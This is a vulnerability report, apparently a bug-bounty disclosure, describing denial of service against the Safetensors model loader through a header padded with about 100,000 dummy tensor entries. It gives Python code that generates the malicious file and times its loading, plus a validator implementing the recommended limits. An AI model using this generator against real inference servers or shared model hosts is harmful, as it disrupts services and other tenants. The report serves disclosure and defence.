Vulnerability Report: Denial of Service (DoS) via Header Bloating in Safetensors

Summary

The Safetensors model format, while designed for safety, is vulnerable to Denial of Service (DoS) attacks through manipulation of its JSON header. Safetensors caps the header at 100 MB, but it places no limit on how many tensor entries that header contains, so an attacker can craft a header with a very large number of entries (e.g., 100,000 or more). When a victim loads such a model, the JSON parser must process every entry before any tensor data can be read, which costs CPU time and memory in proportion to the entry count. An attacker can exploit this to crash inference servers or significantly delay model loading.

Target

Safetensors (.safetensors) - Hugging Face

Impact

Denial of Service (DoS): An attacker can distribute a malicious Safetensors model that, when loaded, consumes all available CPU/memory resources, effectively shutting down the inference service or the user's application.
Resource Exhaustion: In multi-tenant environments (like model hosting platforms), a single malicious model can impact the performance of the entire host.
Bypass of "Safe" Format Assumptions: Safetensors is often assumed to be immune to all loading-time attacks. This vulnerability demonstrates that resource exhaustion is still a viable attack vector.

Proof of Concept (PoC)

The PoC is a Safetensors file (malicious.safetensors) with a bloated header containing 100,000 dummy tensor entries.

Reproduction Steps:

1. Install the safetensors library: pip install safetensors
2. Run the provided safetensors_poc.py script to generate malicious.safetensors.
3. Attempt to load the model using safetensors.safe_open().
4. Monitor the CPU and memory usage during the loading process.
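
The safetensors_poc.py script itself is not reproduced in this report. The following is a minimal sketch of what such a generator could look like, assuming the publicly documented file layout (an 8-byte little-endian header length, the JSON header, then raw tensor bytes). The function names build_bloated_bytes, write_poc and time_safe_open are hypothetical, and the choice of one-byte U8 tensors is an assumption made to keep the file structurally valid.

```python
import json
import struct
import time


def build_bloated_bytes(num_tensors=100_000):
    """Return the bytes of a safetensors-style file with many 1-byte tensors."""
    header = {}
    for i in range(num_tensors):
        # Assumption: each dummy tensor is a single U8 element stored at byte i.
        header[f"t{i}"] = {"dtype": "U8", "shape": [1], "data_offsets": [i, i + 1]}
    header_bytes = json.dumps(header, separators=(",", ":")).encode("utf-8")
    prefix = struct.pack("<Q", len(header_bytes))  # 8-byte little-endian length
    data = bytes(num_tensors)  # data section: one zero byte per tensor
    return prefix + header_bytes + data


def write_poc(path, num_tensors=100_000):
    """Write the generated file to disk and return its size in bytes."""
    blob = build_bloated_bytes(num_tensors)
    with open(path, "wb") as f:
        f.write(blob)
    return len(blob)


def time_safe_open(path):
    """Open the file with safetensors and time key enumeration (step 3)."""
    # Imported lazily so the generator works without safetensors installed.
    # Assumption: framework="np" is used, so numpy may need to be installed too.
    from safetensors import safe_open

    start = time.perf_counter()
    with safe_open(path, framework="np") as f:
        count = len(list(f.keys()))
    return count, time.perf_counter() - start
```

Calling write_poc("malicious.safetensors") followed by time_safe_open("malicious.safetensors") covers steps 2 and 3; raising num_tensors shows how load time and memory respond to the entry count.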

Technical Details

The loader must parse the entire JSON header before it can access any tensor, and that work grows with the number of entries. The 100 MB limit bounds only the header's byte length; within that budget, the structure of the JSON (number of keys, nesting depth) can be chosen to maximize parsing time and memory use. Safetensors relies on the efficiency of the underlying JSON parser and does not impose its own limits on the number of tensors or the complexity of the metadata.
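
To illustrate how parsing cost tracks the entry count rather than any fixed bound, here is a rough measurement sketch. It uses Python's json module as a stand-in parser, which is an assumption: the library's own parser is not Python's json, so only the trend is meaningful, not the absolute timings. The helper names header_json and measure are hypothetical.

```python
import json
import time


def header_json(num_tensors):
    """Build a header string with num_tensors minimal tensor entries."""
    entries = {
        f"t{i}": {"dtype": "U8", "shape": [1], "data_offsets": [i, i + 1]}
        for i in range(num_tensors)
    }
    return json.dumps(entries, separators=(",", ":"))


def measure(counts=(1_000, 10_000, 100_000)):
    """Return (entry_count, header_bytes, parse_seconds) for each count."""
    results = []
    for n in counts:
        text = header_json(n)
        start = time.perf_counter()
        parsed = json.loads(text)  # stand-in for the loader's header parse
        elapsed = time.perf_counter() - start
        assert len(parsed) == n
        results.append((n, len(text.encode("utf-8")), elapsed))
    return results


if __name__ == "__main__":
    for n, size, seconds in measure():
        print(f"{n:>8} entries  {size:>10} bytes  {seconds:.4f} s")
```

The header size column also shows how far a given entry count sits below the 100 MB cap, which is the headroom an attacker has available.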

Recommended Fix

Limit Number of Tensors: Implement a reasonable limit on the maximum number of tensor entries allowed in a single Safetensors file.
Complexity Checks: Add checks for JSON nesting depth and key count during header parsing.
Asynchronous/Resource-Limited Parsing: Perform header parsing in a resource-constrained environment to prevent a single model from exhausting the host's resources.
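
The first two recommendations could be prototyped as a pre-load gate that an application runs before handing a file to the library. This is a sketch under stated assumptions, not a patch to Safetensors: the limits (1 MB header, 10,000 tensors, depth 4) are hypothetical placeholders, and check_header_bytes, check_file and HeaderRejected are illustrative names.

```python
import json
import struct


class HeaderRejected(ValueError):
    """Raised when a header exceeds one of the configured limits."""


def nesting_depth(value):
    """Return the deepest container nesting level, computed iteratively."""
    deepest = 0
    stack = [(value, 1)]
    while stack:
        node, level = stack.pop()
        if isinstance(node, dict):
            deepest = max(deepest, level)
            stack.extend((child, level + 1) for child in node.values())
        elif isinstance(node, list):
            deepest = max(deepest, level)
            stack.extend((child, level + 1) for child in node)
    return deepest


def check_header_bytes(blob, max_header_bytes=1_000_000, max_tensors=10_000, max_depth=4):
    """Validate the header at the start of blob; return the tensor count."""
    if len(blob) < 8:
        raise HeaderRejected("file too short for the length prefix")
    (declared,) = struct.unpack("<Q", blob[:8])
    if declared > max_header_bytes:  # reject before parsing anything
        raise HeaderRejected(f"header is {declared} bytes, limit is {max_header_bytes}")
    raw = blob[8:8 + declared]
    if len(raw) != declared:
        raise HeaderRejected("header is truncated")
    try:
        header = json.loads(raw)
    except (ValueError, RecursionError) as exc:
        raise HeaderRejected(f"header is not parseable JSON: {exc}") from exc
    if not isinstance(header, dict):
        raise HeaderRejected("header is not a JSON object")
    tensors = [name for name in header if name != "__metadata__"]
    if len(tensors) > max_tensors:
        raise HeaderRejected(f"{len(tensors)} tensors, limit is {max_tensors}")
    if nesting_depth(header) > max_depth:
        raise HeaderRejected(f"nesting deeper than {max_depth}")
    return len(tensors)


def check_file(path, **limits):
    """Read only the prefix and header from disk, then validate them."""
    cap = limits.get("max_header_bytes", 1_000_000)
    with open(path, "rb") as f:
        prefix = f.read(8)
        declared = struct.unpack("<Q", prefix)[0] if len(prefix) == 8 else 0
        body = f.read(min(declared, cap))  # never read more than the cap
    return check_header_bytes(prefix + body, **limits)
```

Because the byte cap is enforced before json.loads runs, the parse cost of this gate is itself bounded; the tensor-count and depth checks then catch headers that are small in bytes but still unusually dense. The third recommendation (resource-limited parsing) would need process-level controls and is not covered by this sketch.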

⚡️👾 by🇭🇷PhonkAlphabet 👾⚡️
